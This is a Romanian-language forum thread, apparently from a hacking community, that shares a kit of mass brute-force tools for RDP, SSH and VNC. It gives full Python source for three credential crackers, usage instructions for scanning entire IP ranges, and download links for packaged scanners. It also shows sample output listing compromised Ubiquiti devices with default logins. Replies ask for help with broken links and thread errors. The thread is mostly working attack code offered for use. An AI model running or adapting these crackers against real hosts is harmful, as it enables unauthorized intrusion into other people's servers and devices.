Guest Posted May 15, 2014 Report Posted May 15, 2014 (edited) Windows-RDPDUbrute 2.1 + Scanner IP - DUbrute 2.1 + Scanner IP [Nmap].rar download - 2shared [ asta e cel mai usor de folosit , doar trebuie sa dati click pe executabile , la dubrute trebuie sa-i faceti configul cu ip-urile scanate din nmap si sa adaugati userii si parolele. ]Fast RDP brute GUI v2.0 - pass: dservers.ruVersiune PYTHON pentru RDP brute :#! /usr/bin/env python# RDP Dictionary Attack# 21.05.2012 cmiN## THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY# I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM## Connect with rdesktop, xfreerdp or something similar using# servers, users and passwords from files.# After checking if the port is opened, the wrapper opens a shell console# executing the client with data from input files. In the meantime# a local socket is accepting connections from the target and if the link# is established then the user and password for that server are a match.## You need rdesktop/xfreerdp (sudo apt-get/yum/equo install rdesktop/freerdp).# On gentoo based systems use emerge to find and install the newest packages.# Contact: cmin764@yahoo/gmail.comfrom sys import argv, platformfrom threading import Thread, active_count, Lockfrom subprocess import Popenfrom socket import *# defaultsTHRD = 4 # how many threads for crack phaseTOUT = 6.0 # timeout in seconds# get global host iptry: sock = socket(AF_INET, SOCK_STREAM) sock.connect(("", 80)) # assuming google worksexcept error as excp: # error from socket (timed out or invalid server) print "Check your internet connection: %s." % excp exit()else: HOST = sock.getsockname()[0]finally: sock.close() del sockPORT = 51337 # used for local listening# attack modesRDP1 = ["rdesktop", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}", "-g", "1x1", "-a", "8", "-x", "m", "-z", "-m", "{server}"]RDP2 = ["xfreerdp", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}", "-g", "1x1", "-a", "8", "-x", "m", "-z", "--no-motion", "{server}"]VERB = False # verboseMETH = "r" # RDP1USER = ["Administrator"]SAFE = TrueSWTC = TrueLIMT = None # attacks (test only, None -> unlimited)class Engine: """Main class used to find and crack servers with desired options. For more info see usage from the bottom of the script. It executes commands through subprocess and waits for replies within timeout. """ def __init__(self, threads, timeout, host, port, rdp1, rdp2, verbose, method, usr, safe, switch): """Copy global options and prepare the core.""" self.cli = True # activate print/stdout (set to False if a GUI is used) self.threads = threads self.timeout = timeout = host self.port = port self.rdp1 = rdp1 self.rdp2 = rdp2 self.verbose = verbose self.sockets = dict() # D[x] = True if x is available otherwise False self.pos = list() # list with indexes (user, password, server, telnet) self.usr = usr self.pwd = None self.server = None # set the command used for scanning if method == "x": self.command = self.rdp2 else: self.command = self.rdp1 # default: don't save self.working = None self.cracked = None self.good = list() # rdp servers self.delete = set() # dispose of cracked servers self.lock = Lock() # global printing thread synchronization self.sock_mutex = Lock() # for localhost socket use if "linux" in platform: self.null = open("/dev/null", "w") else: self.null = open("NUL", "w") = safe self.switch = switch def __del__(self): """Destructor.""" if hasattr(self.server, "close"): self.server.close() if hasattr(self.usr, "close"): self.usr.close() if self.pwd: self.pwd.close() if self.working: self.working.close() if self.cracked: self.cracked.close() for sock in self.sockets: sock.shutdown(SHUT_RDWR) sock.close() def generator(self, src, dest): """Just like grandpa's old mileage meter :].""" temp = "%d.%d.%d.%d" byte = 256 yield temp % tuple(src) # yield -> the beauty of python while (src != dest): # like return but continue src[3] += 1 if src[3] == byte: src[3] = 0 src[2] += 1 if src[2] == byte: src[2] = 0 src[1] += 1 if src[1] == byte: src[1] = 0 src[0] += 1 yield temp % tuple(src) def set_threads(self, threads): self.threads = threads def set_safe(self, safe): = safe def set_switch(self, switch): self.switch = switch def set_timeout(self, timeout): self.timeout = timeout def set_verbose(self, verbose): self.verbose = verbose def set_method(self, method): if method == "x": self.command = self.rdp2 else: self.command = self.rdp1 def set_usr(self, usr): """If this is called, then the users are taken from a file.""" self.usr = open(usr, "r") # do not use the generic one def set_pwd(self, pwd): """The file with passwords is mandatory.""" self.pwd = open(pwd, "r") def set_srv(self, server): """Make a file object or range generator from argument.""" if server.find("-") == -1: # not found -> not range self.server = open(server, "r") else: chunks = server.split("-") src, dest = chunks[0].split("."), chunks[1].split(".") for i in xrange(4): src[i] = int(src[i]) dest[i] = int(dest[i]) self.server = self.generator(src, dest) def set_working(self, working): """Save progress in scan phase.""" self.working = open(working, "a") # safe append def set_cracked(self, cracked): """Save progress in crack phase.""" self.cracked = open(cracked, "a") def scan_server(self, server): """Check if the rdp port is opened on the specified server.""" try: # create the socket and connect sock = socket(AF_INET, SOCK_STREAM) sock.connect((server, 3389)) except error: # timed out in most cases if self.verbose: self.lock.acquire() if self.cli: print "[-] %s [NO]" % server # only with -v self.lock.release() else: # good news everyone self.lock.acquire() if self.cli: print "[+] %s [OK]" % server self.good.append(server) if self.working: self.working.write(server + "\n") self.working.flush() self.lock.release() finally: sock.close() def scan(self): """Just like a port scanner for 3389.""" setdefaulttimeout(self.timeout / 10.0) # 10% for server in self.server: while active_count() > self.threads * 16: pass # do not exceed number of threads if self.switch: # scan them # now call the method in a separate thread Thread(target=self.scan_server, args=[server.strip()]).start() else: # or skip the scan self.good.append(server.strip()) while active_count() > 1: pass # join all def acquire_sock(self): for sock, state in self.sockets.iteritems(): if state: # available self.sockets[sock] = False # use it return sock def release_sock(self, sock): self.sockets[sock] = True def crack_server(self, command): try: # get a server self.sock_mutex.acquire() sock = self.acquire_sock() self.sock_mutex.release() command[self.pos[3]] = command[self.pos[3]].format(port=sock.getsockname()[1]) child = Popen(command, stdout=self.null, stderr=self.null) # no wait sock.accept() # here is the big overhead except error as excp: # timed out if self.verbose: self.lock.acquire() if self.cli: print "[-] %s %s %s [NO]" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]]) self.lock.release() else: # good news again show = "%s %s %s" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]]) self.delete.add(command[self.pos[2]]) # cracked! no need to process again self.lock.acquire() if self.cli: print "[+] " + show + " [OK]" if self.cracked: self.cracked.write(show + "\n") self.cracked.flush() self.lock.release() finally: child.kill() # do not close it, instead release it for further use self.release_sock(sock) # O(1) and can't affect the same socket def crack(self): """For each user take each password and test them with each working server.""" goodLen = len(self.good) if goodLen == 0: if self.cli: print "[!] No servers to crack." return if # avoid deadlocks or strange behavior self.set_threads(min(self.threads, goodLen)) users = [line.strip() for line in self.usr] passwords = [line.strip() for line in self.pwd] if self.cli: print "[i] Cracking %d hosts in %fs." % (goodLen, float(len(users)) * len(passwords) * goodLen * self.timeout / self.threads) setdefaulttimeout(self.timeout) # now use the real timeout # prepare the sockets for port in xrange(self.threads): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(self.timeout) sock.bind((, self.port + port)) sock.listen(1) self.sockets[sock] = True # init command template command = self.command shellIndex = command.index("telnet {host} {port}") command[shellIndex] = command[shellIndex].format(, port="{port}") self.pos = [command.index("{user}"), command.index("{password}"), command.index("{server}"), shellIndex] attacks = 0 for user in users: command[self.pos[0]] = user for password in passwords: command[self.pos[1]] = password for server in self.good: command[self.pos[2]] = server while active_count() > self.threads: pass # do not exceed number of threads attacks += 1 if LIMT and attacks > LIMT: if self.cli: print "[!] Limit reached, buy the script." return # now call the method in a separate thread Thread(target=self.crack_server, args=[command[:]]).start() for server in self.delete: # N^2 can be reduced to NlogN with set self.good.remove(server) # and also to N with index memorization self.delete.clear() while active_count() > 1: pass # join alldef parse(): at = 1 params = list() while at < argc: if argv[at] in ("-h", "--help"): print usage exit() # do not start the process elif argv[at] in ("-v", "--verbose"): app.set_verbose(True) elif argv[at] in ("-t", "--threads"): at += 1 app.set_threads(int(argv[at])) elif argv[at] in ("-T", "--timeout"): at += 1 app.set_timeout(float(argv[at])) elif argv[at] in ("-m", "--method"): at += 1 app.set_method(argv[at]) elif argv[at] in ("-w", "--working"): at += 1 app.set_working(argv[at]) elif argv[at] in ("-c", "--cracked"): at += 1 app.set_cracked(argv[at]) elif argv[at] in ("-s", "--safe-off"): app.set_safe(False) elif argv[at] in ("-n", "--no-scan"): app.set_switch(False) else: if argv[at][0] == "-": raise Exception("Invalid option") params.append(argv[at]) at += 1 pLen = len(params) if pLen not in (2, 3): raise Exception("Invalid number of parameters") app.set_srv(params[-1]) app.set_pwd(params[-2]) if pLen == 3: app.set_usr(params[-3]) # same index as 0def main(): try: if argc == 1: # show a message or start the GUI which is missing print "You should run: %s --help" % argv[0] exit() # or parse the arguments parse() # and start the scanner print "[i] Scan phase started." app.scan() # filter the input for working rdp servers print "[i] Crack phase started." app.crack() # crack them except Exception as excp: print "[x] Error: %s." % excp except KeyboardInterrupt: print "[!] Stopped." else: print "[i] Finished."if __name__ == "__main__": argc = len(argv) usage = """Usage: {0} [options] [usr] pwd serverOptions: -t, --threads <number> number of threads (parallel connections) -s, --safe-off by default the number of threads is reduced to the number of working servers if it's greater use this option to keep the number of threads -T, --timeout <seconds> waiting response time for each connection -m, --method <r/x> use [r]desktop or [x]freerdp -w, --working <file> file used to store servers with 3389 opened -c, --cracked <file> file used to store cracked servers -n, --no-scan skip scan phase asumming all servers are working rdps -v, --verbose show extra information (default off) -h, --help show this helpParameters: usr users file (default users: {1}) pwd passwords file server servers file or range (abc.def.ghi.jkl-mno.pqr.stu.vwx)Examples: {0} -c cracked.txt passwords.txt {0} -w good.txt --timeout 2 -s pass.txt {0} -t 256 -T 5 -v -c cracked.txt -n users.txt pass.txt good.txtUsers, passwords and working servers are loaded into memory.Be aware to not open a file for both read and write. More exactly do not usethe same file name with `-w`/`-c` and `server`.THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLYI AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAMSend bugs to cmin764@yahoo/""".format(argv[0], USER) app = Engine(THRD, TOUT, HOST, PORT, RDP1, RDP2, VERB, METH, USER, SAFE, SWTC) main() del appUsage: {0} [options] [usr] pwd serverOptions: Quote -t, --threads <number> number of threads (parallel connections) -s, --safe-off by default the number of threads is reduced to the number of working servers if it's greater use this option to keep the number of threads -T, --timeout <seconds> waiting response time for each connection -m, --method <r/x> use [r]desktop or [x]freerdp -w, --working <file> file used to store servers with 3389 opened -c, --cracked <file> file used to store cracked servers -n, --no-scan skip scan phase asumming all servers are working rdps -v, --verbose show extra information (default off) -h, --help show this helpParameters: Quote usr users file (default users: {1}) pwd passwords file server servers file or range (abc.def.ghi.jkl-mno.pqr.stu.vwx)Examples: Quote {0} -c cracked.txt passwords.txt {0} -w good.txt --timeout 2 -s pass.txt {0} -t 256 -T 5 -v -c cracked.txt -n users.txt pass.txt good.txtUsers, passwords and working servers are loaded into memory.Be aware to not open a file for both read and write. More exactly do not usethe same file name with `-w`/`-c` and `server`.THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLYI AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM- Servere linux cu acces rootScanner versiune PYTHON:import paramiko, sys, Queue, threadingclass SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return Falsedef brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = with open(str(sys.argv[3]),'rU') as uf: users = with open(str(sys.argv[4]),'rU') as pf: passwords = global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join()if __name__ == "__main__": brutemain()In cazul in care nu stiti comenzile , doar rulati-le si va va da script-ul niste comenzi.Exemplu care sunt bune: Quote 68.170.**.24 ubnt ubnt|Linux Ubiquiti #1 Thu Aug 16 13:41:25 EEST 2012 mips unknown68.117.**.194 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown68.13.**.45 ubnt ubnt|Linux Ubiquiti 2.6.15-5.2 #1 Mon Dec 19 20:46:46 EET 2011 mips unknown68.170.**.64 ubnt ubnt|Linux AirRouter #1 Fri Mar 8 10:15:49 EET 2013 mips unknown- VNCVersiunea cu executabil: GirlShare - Download Windows.rar - doar rulati-l si scrieti help , veti vedea care sunt comenzile. [trebuie sa modificati fisierul config ca sa scanati o clasa de ip]Versiunea PYTHON:import socket, structfrom Crypto.Cipher import DESfrom sys import exc_info, exit, version_info, maxintimport sysimport Queue, threadingbad = open('bad.txt','w')valid = open('valid.txt','a')err = open('error.txt','w')cracked = []try: with open('valid.txt','rU') as vf: valids = for val in valids: h1 = val.split(" ")[0] cracked.append(h1)except: passqueue = Queue.Queue(maxsize=4000)with open('ips.txt','rU') as ipf: hosts = open('pass.txt','rU') as pf: passwords = = int(sys.argv[1])Verbose = str(sys.argv[2])def gen_key(key): try: newkey = [] for ki in range(len(key)): bsrc = ord(key[ki]) btgt = 0 for i in range(8): if bsrc & (1 << i): btgt = btgt | (1 << 7-i) newkey.append(btgt) if version_info[0] == 2: return ''.join(chr(c) for c in newkey) else: return bytes(newkey) except: passclass VNCBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: host,passwd = self.queue.get() self.checker(host,passwd) self.queue.task_done() def checker(self,host,password): try: if host in cracked: return False s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setblocking(0) s.settimeout(25) s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) s.connect((host,5900)) resp = s.recv(99) version = resp[:11].decode('ascii') if len(resp) > 12: s.close() return False major, minor = version[6], version[10] if (major, minor) in [('3', '8'), ('4', '1')]: proto = b'RFB 003.008\n' elif (major, minor) == ('3', '7'): proto = b'RFB 003.007\n' else: proto = b'RFB 003.003\n' s.sendall(proto) resp = s.recv(99) if minor in ('7', '8'): code = ord(resp[0:1]) if code == 0: s.close() return False s.sendall(b'\x02') resp = s.recv(99) else: code = ord(resp[3:4]) if code != 2: s.close() return False resp = resp[-16:] if len(resp) != 16: s.close() return False sys.stdout.write("\r[+]Trying "+host+' '+password+' ') sys.stdout.flush() pw = password.ljust(8, '\x00')[:8] key = gen_key(pw) des =, DES.MODE_ECB) enc = des.encrypt(resp) s.sendall(enc) resp = s.recv(99) code = ord(resp[3:4]) mesg = resp[8:].decode('ascii', 'ignore') if code == 1: if Verbose == 'v': bad.write(host+'\n') bad.flush() s.close() elif code == 0: valid.write(host+' '+password+'\n') valid.flush() cracked.append(host) print '\rOWNED!!! '+' '+host+' '+password,' ' s.close() else: s.close() return False except Exception, e: err.write(host+'\n') err.flush() passdef main(): try: i = 0 for i in range(ThreadNmber): t = VNCBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Stopped at',i,'Threads' sys.exit() print i,'Threads spawned' for password in passwords: for host in hosts: queue.put((host,password)) queue.join()print '[+] VNC Brute Force Tool'print '[+] Author: Elohim ' main()Exemplu folosire:python 100 v/no- 100 = Numarul de threaduri. Testat pana la 1400 de threaduri, merge impecabil daca ne permite viteza internetului.v/no = Daca se lasa decat V, si se foloseste doar un user si o parola, se va scrie in fisierul bad.txt DOAR ipurile care chiar ruleaza un soft de vnc, si autentificarea nu a avut success.Acea comanda o rulati in cmd , unde aveti fisierul .py pus [EX: run>cmd>cd Desktop>python 225 v]Linux- RDPRDPSploit - GirlShare - Download ; doar il rulati , o sa va dea comenzile : contine si range-urile pe tariVersiunea PYTHON - O PUTETI DESCARCA PE CEA DE LA WINDOWS , ESTE LA FEL- Servere linux cu acces rootGosh2013 V2[NECESITA ETH0] - Gosh2013gosh20013.tgzUtilizare: ./go 199 Versiunea PYTHON - O PUTETI DESCARCA PE CEA DE LA WINDOWS , ESTE LA FELBruteforce ssh2 private scanner - - bssh.tgz Quote Avantaje:1. filtreaza busybox2. toate cele din bash.txt sunt servere bune3. exista session.txt , daca se restarteaza root-ul, poti porni manual din ssh24. daca root-ul are mai multe interfete (ip-uri) se pot pune in fisierul interfaces.txt cate un ip pe rand, asta ajuta la scanarea mai buna pentru ca se fac requesturi de pe mai multe ip5. pscanul este facut cu multithread adica mult mai rapid decat cele publiceCum se foloseste?./scan A ./scan B./scan CA = range A ; ex: ./scan 70B = range B ; ex: ./scan 70.8C = range C ; ex: ./scan 70.6.1- VNCVersiunea PYTHON - DESCARCATI VERSIUNEA DE LA WINDOWS , ESTE LA FEL.VNC Pizza 0x100 - - 400.rarNecesita eth0 , doar rulati scriptul si va va da indicatii.- - GirlShare - Download ssh.zipQuote:Exemplu: ./scan 188NoLoginele se salveaza in fisierul “vuln.txt” Edited June 19, 2014 by BlackGate Quote
Gio33 Posted May 15, 2014 Report Posted May 15, 2014 Pune si un virus scan la exe-uri, era dragut sa cryptezi linkurile...Acum asteapta te la intrebari "ce fac imi da eroare xyz" , " cum fac..." , "ce e eth0 ?", "cine are un r00t ?", "da ala prinde bine?", "un passfile bun imi dati si mie" .. Quote
CaBRoN88 Posted May 17, 2014 Report Posted May 17, 2014 interesanta mini colectia ia sa vedem ce putem folosi.merci Quote
SuKySK Posted June 13, 2014 Report Posted June 13, 2014 - GirlShare - Download - nu mai merge descarcata .RDPSploit - GirlShare - Download - este corupta . Quote
Active Members dancezar Posted June 13, 2014 Active Members Report Posted June 13, 2014 SuKySK said: - GirlShare - Download - nu mai merge descarcata .RDPSploit - GirlShare - Download - este corupta .RDPSploit nu este corupta extrage cu WinRar si arhiveaza din nou Quote
SuKySK Posted June 13, 2014 Report Posted June 13, 2014 ! C:\Documents and Settings\*\Desktop\ The archive is either in unknown format or damageddanyweb , nu sunt nebun .. Quote
F4LL007 Posted June 19, 2014 Report Posted June 19, 2014 Am o problema la VNC Scanner.Imi da eroare cand scaneaza din cauza threadurilor.Nu mi-a facut asta pana acum niciodata. Quote
Elohim Posted June 19, 2014 Report Posted June 19, 2014 F4LL007 said: Am o problema la VNC Scanner.Imi da eroare cand scaneaza din cauza threadurilor.Nu mi-a facut asta pana acum niciodata.Daca windows, mai scade din thread-uriDaca linux, un ulimit -s 512 inainte ar trebui sa rezolve problema, si la fel, mai scade din thread-uri Quote
Guest Posted June 19, 2014 Report Posted June 19, 2014 era greu tare sa stergeti < / br> de la link pentru gosh am modificat eu ca voua va e - functioneazardpsploit- functioneaza si el , va trebuie doar creier Quote
snip Posted August 4, 2014 Report Posted August 4, 2014 Daca poti sa schimbi linkul din 2shared in zippy:)) Quote
StereoONLINE Posted August 21, 2014 Report Posted August 21, 2014 La ip (Du burte) se pune clasa adica169.0.0.0 - ? sau doar un ip.. Quote
jaokaojao Posted September 12, 2014 Report Posted September 12, 2014 un update link gosh va rog? Quote